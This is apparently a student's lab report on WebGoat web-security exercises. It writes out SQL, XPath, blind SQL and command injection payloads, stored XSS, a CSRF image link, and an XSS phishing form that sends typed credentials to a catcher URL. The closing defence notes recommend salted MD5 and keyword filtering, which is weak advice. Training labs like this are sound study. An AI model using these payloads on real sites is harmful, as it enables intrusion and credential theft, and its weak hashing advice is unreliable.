2017-2018-2 20155225《网络对抗技术》实验九 Web安全基础

Posted 2020-11-09 jiangzhiyu

2017-2018-2 20155225《网络对抗技术》实验九 Web安全基础

WebGoat

1.String SQL Injection

题目是想办法得到数据库所有人的信用卡号，用Smith登录后，得到Smith的两个信用卡号，如图

但如何才能得到所有人的信用卡号呢？

只需要输入\' or 1 = \' 1，这样构造可以将引号闭合，再or上一个永真式，就能屏蔽掉前面的条件。

2、Log Spoofing

在User Name中以这种格式注入：Use CR (%0d) and LF (%0a) for a new line。比如输入20155225jzy%0d%0aLogin succeeded !

3、Numeric SQL Injection

这个题目也是要得到数据库全部天气数据，但没有一个可以输入的文本框怎么办呢？

查看页面源代码，在输入下拉框中，向后台提交value值，所以只需在后面加上or 1=1 永真式即可。

登录成功：

4、Command Injection

还是可以用修改页面源码的方法。在后面加上能够在目标主机上执行的命令："& netstat -an & ipconfig"

可见直接改变了下拉框选项，里面出现了我们希望系统执行的命令。

成功：

5、Stage 1:String SQL Injection

开始我们想在密码框输入\' or 1=1 --注入，但是失败了。查看网页源码发现，对密码框输入进行了限制。

修改密码限制之后，成功登录：

6、XPATH Injection

这是一个职员私人数据查询系统，我们的目的是看到其他职员的信息。

XPath 是一门在 XML 文档中查找信息的语言。除了在输入1 = 1以外，还需要选择一个XML节点，输入\'a\' = \'a。

所以只需在User Name输入20155225jzy\' or 1=1 or \'a\'=\'a

在Password输入20155225jzy即可成功获得所用员工信息。

7、Blind String SQL Injection

使用盲字符串SQL注入进行爆破，感觉这个好难啊，不太明白逻辑，所以去看了一下答案。

解决方法是通过将一个布尔表达式注入到预脚本SQL查询中来找出名称。

首先是和H比较：101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=\'4321432143214321\'), 1, 1) < \'H\' );返回false并显示无效账号。

变成< \'L\' 会返回true，这样我们就知道这个字母是在H和Lz之间。再经过几次查询就能判断出第一个字母是J。

同理，最终可以推出用户名是Jill。

8、Phishing with XSS

用XSS和html注入，在搜索框注入下面这段html：

</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " +                         document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

然后会看到一个可以输入用户名密码的表单，直接点击登录。WebGoat会将输入的信息捕获并反馈回来，攻击成功。

9、Stored XSS Attacks

这是存储型XSS攻击。在Title里输入学号，在Message里输入<script>alert("20155225 attack succeed!");</script>攻击成功。

10、Cross Site Request Forgery(CSRF)

写一个URL诱使其他用户点击，从而触发CSRF攻击，我们可以以图片的的形式将URL放进Message框，这时的URL对其他用户是不可见的，用户一旦点击图片，就会触发一个CSRF事件。如图：

基础问题回答

1、SQL注入攻击原理，如何防御

SQL注入攻击值得是通过构建特殊的输入作为参数传入web应用程序，而这些输入大都是SQL语法里的一下组合，

通过执行SQL语句进执行攻击者所要的操作，其主要原因是程序没有细致的过滤用户输入的数据，致使非法数据侵入系统。

预防方法：

1、首先要对输入的数据进行过滤，将常见的sql语句的关键词：select or \' " 等字符进行过滤。

2、对在数据库中对密码进行加密，验证登陆的时候先将 密码进行加密再与数据库中加密的密码进行对比，若此时一致则基本是安全的。

3、对数据库中密码采用常用的MD5加密时尽量在字符串的前边和后边加上指定字符后在进行加密，这样即便是看到了数据库也很难破解密码。

2、XSS攻击的原理，如何防御

XSS是Cross-site scripting，为了和CSS层叠样式表区分所以取名XSS。是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。　　

　　XSS攻击的主要目的则是，想办法获取目标攻击网站的cookie，因为有了cookie相当于有了seesion，有了这些信息就可以在任意能接进互联网的pc登陆该网站，并以其他人的生份登陆，做一些破坏。预防措施，防止下发界面显示html标签，把</>等符号转义
　　
　　预防方法：
　　
　　当恶意代码值被作为某一标签的内容显示：在不需要html输入的地方对html 标签及一些特殊字符( ” < > & 等等 )做过滤，将其转化为不被浏览器解释执行的字符。

当恶意代码被作为某一标签的属性显示，通过用 “将属性截断来开辟新的属性或恶意方法：属性本身存在的 单引号和双引号都需要进行转码；对用户输入的html 标签及标签属性做白名单过滤，也可以对一些存在漏洞的标签和属性进行专门过滤。

3、XSRF攻击原理，如何防御

预防方法：

(1).Cookie Hashing(所有表单都包含同一个伪随机值)：

这可能是最简单的解决方案了，因为攻击者不能获得第三方的Cookie(理论上)，所以表单中的数据也就构造失败了:在表单里增加Hash值，以认证这确实是用户发送的请求。然后在服务器端进行Hash值验证

　　(2).验证码

　　这个方案的思路是：每次的用户提交都需要用户在表单中填写一个图片上的随机字符串。

　　(3).One-Time Tokens(不同的表单包含一个不同的伪随机值)
　　

总结

通过这次实验，我了解到web攻击的一些基本内容，也感受到web安全有很广阔的探索空间，希望以后还会有机会继续学习。